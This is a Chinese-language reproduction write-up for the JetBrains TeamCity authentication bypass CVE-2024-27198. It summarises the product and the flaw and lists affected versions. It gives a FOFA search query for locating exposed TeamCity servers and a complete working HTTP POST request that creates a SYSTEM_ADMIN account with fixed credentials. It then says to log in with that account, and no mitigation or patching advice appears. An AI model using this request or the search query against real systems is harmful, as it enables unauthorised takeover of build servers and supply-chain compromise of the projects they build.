JetBrains TeamCity 身份验证绕过漏洞【CVE-2024-27198】
一、产品简介
JetBrainsa TeamCity是一款出JetBrains开发的持续集成和持续交付(CICD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。
二、漏洞概述
JetBrains Teamcitv发布新版本修复了两个高危漏洞JetBrains Teamcitv 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCitvy 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
三、影响范围
TeamCity< 2023.11.4
四、复现环境
FOFA: body="Log in to TeamCity"
五、漏洞复现
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: youip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
{"username": "qqwweerr", "password": "qqwweerr", "email": "qqwweerr@test.com","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
使用账号密码:qqwweerr/qqwweerr登陆系统: